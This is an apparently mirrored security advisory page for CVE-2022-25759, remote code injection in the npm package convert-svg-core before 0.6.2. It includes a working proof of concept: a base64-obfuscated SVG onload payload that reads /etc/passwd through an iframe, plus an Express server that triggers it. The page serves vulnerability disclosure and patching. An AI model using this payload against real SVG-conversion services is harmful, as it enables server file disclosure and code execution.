Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS01Z3hjLWZ4Y3ItOTMyNs4AAtlY
convert-svg-core vulnerable to remote code injection
The package convert-svg-core before 0.6.2 is vulnerable to Remote Code Injection via sending an SVG file containing the payload in an onload attribute. Puppeteer/Chromium (used by convert-svg-core) will execute any code within that tag, including malicious code.
PoC
Payload
<svg onload=eval(atob(this.id)) id='ZG9jdW1lbnQud3JpdGUoJzxzdmctZHVtbXk+PC9zdmctZHVtbXk+PGlmcmFtZSBzcmM9ImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwMHB4Ij48L2lmcmFtZT48c3ZnIHZpZXdCb3g9IjAgMCAyNDAgODAiIGhlaWdodD0iMTAwMCIgd2lkdGg9IjEwMDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyI+PHRleHQgeD0iMCIgeT0iMCIgY2xhc3M9IlJycnJyIiBpZD0iZGVtbyI+ZGF0YTwvdGV4dD48L3N2Zz4nKTs='></svg>
where the id attribute is the base 64-encoded form of
document.write('<svg-dummy></svg-dummy><iframe src="file:///etc/passwd" width="100%" height="1000px"></iframe><svg viewBox="0 0 240 80" height="1000" width="1000" xmlns="http://www.w3.org/2000/svg"><text x="0" y="0" class="Rrrrr" id="demo">data</text></svg>');
Attack
const { convert } = require('convert-svg-to-png');
const express = require('express');
const fileSvg = `[[[payload]]]`;
// YWxlcnQoMSk=
// function newContent(){document.open(),document.write('<text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text>'),document.close()}
const app = express();
app.get('/poc', async (req, res)=>{
try {
const png = await convert(fileSvg);
res.set('Content-Type', 'image/png');
res.send(png);
} catch (e) {
console.log(e);
res.send("");
}
});
app.listen(3000, ()=>{
console.log('started');
});
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01Z3hjLWZ4Y3ItOTMyNs4AAtlY
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 2 years ago
Updated: 9 months ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.05307
EPSS Percentile: 0.92958
Identifiers: GHSA-5gxc-fxcr-9326, CVE-2022-25759
References:
- https://nvd.nist.gov/vuln/detail/CVE-2022-25759
- https://github.com/neocotic/convert-svg/issues/81
- https://github.com/neocotic/convert-svg/pull/82
- https://github.com/neocotic/convert-svg/commit/7e6031ac7427cf82cf312cb4a25040f2e6efe7a5
- https://security.snyk.io/vuln/SNYK-JS-CONVERTSVGCORE-2849633
- https://github.com/advisories/GHSA-5gxc-fxcr-9326
Blast Radius: 23.0
Affected Packages
npm:convert-svg-core
Dependent packages: 4Dependent repositories: 224
Downloads: 38,638 last month
Affected Version Ranges: < 0.6.2
Fixed in: 0.6.2
All affected versions: 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.4.0, 0.5.0, 0.6.0, 0.6.1
All unaffected versions: 0.6.2, 0.6.3, 0.6.4